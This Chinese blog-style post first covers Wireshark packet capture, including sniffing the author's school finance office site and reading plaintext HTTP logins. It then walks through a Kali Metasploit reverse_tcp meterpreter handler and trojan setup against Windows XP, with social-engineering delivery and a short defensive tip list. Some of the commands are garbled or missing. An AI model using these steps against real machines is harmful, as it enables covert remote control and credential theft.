简介
wireshark是一款操作简单,容易上手的网络抓包分析软件。百度可直接下载汉化版。玩了一下午,先后对本校财务处网站,QQ等进行抓包,写几点心得与大家分享一下。
ps、抓包无非是对tcp/ip五层协议进行分析,所以阅读本文需要具备网络基础。
教程
点击+号,选择过滤流,可以只过滤网站;
地址栏:可以选择过滤的协议http、tcp、dns等;oicq是QQ;
tcp三次握手
在得到http响应时,进行三次tcp握手;
1、第一次握手:客户端发送syn=0
2、第二次握手:服务器ack+1
3、第三次握手:syn+1
追踪tcp流
右键选择追踪流,可显示相关流的信息,出现乱码,证明该流是加密的,如QQ消息;
通过5层协议分析 QQ
1、应用层
开头:oicq-im软件
data流显示了QQ号
2、传输层
在两个主机间提供多种服务,包括建立连接、终止;
UDP传输:源端口8000(国内默认为QQ的端口),目的端口4002;
3、协议层
逻辑寻址,路由选择,确定最佳路线;
IPv4的版本;src源地址、dst目的地址;
存活时间56;
4、数据链路层
为了适应物理介质中传输,将数据格式化成帧;
目的MAC、源MAC;路由MAC;
5、物理层
物理特征;
网络接口、设备地址;
另外可以对http网站抓包分析出,登陆是传输的账号和密码;这个挺有意思的哦!!
利用kali(linux)攻击windows
许多人觉的杀毒软件没啥乱用,留着占内存,或者在安全卫士和杀毒两个之间取舍一个,,,我想说的是,这太没有文化了。。文末会告诉大家为什么太没有文化的原因,,敬请往后看。。。
今天我给大家带来的是Hacker如何使用 三行代码入侵Windows的教程。
环境:kali+Windows xp
工具:kali>metasploit
有人肯定要想kali是什么呢,请看下图LOGO,看见没,是不是很霸气的一条带翅膀的龙!!超爱这个logo。。。咦,该进入正题了。。
在kali环境下root输入一下三行代码
(LHOST 本地ip)此时就生成了一个名为test.exe的测试木马。。
Msf> use exploit/multi/handler
(handler)>set payloud windows/meterpreter/reverse_tcp
>show options
>show LHOST 本地ip
>exploit
(此时这个木马就已经加载好了,如下图的监听模式)
接下来就是想办法让Windows下载这个木马并加载,这就要看自己的套路有多深了,我就不多赘述(具体可以看 社会工程学 这本书)。
我自己的Windows 下载了这个木马。。打开之后我的Windows边已经被监听了,Windows里面的内容被暴露无疑。。
•reboot-重新启动受害人的计算机(现在知道你的电脑为啥无缘无故就重启了吧,Hacker一个命令而已)
•ps -列出正在运行的进程
一个ps命令的使用,使你电脑里面的所有文件被光天化日的拉出来了,而这一切的一切都在毫无察觉的情况下发生了。
看起来好厉害,对吧。。。那如何防止这种事情发生呢。
1.不要随便点击来历不明的文件以及安装包。要到正规网站下载。
2.安装杀毒软件和安全卫士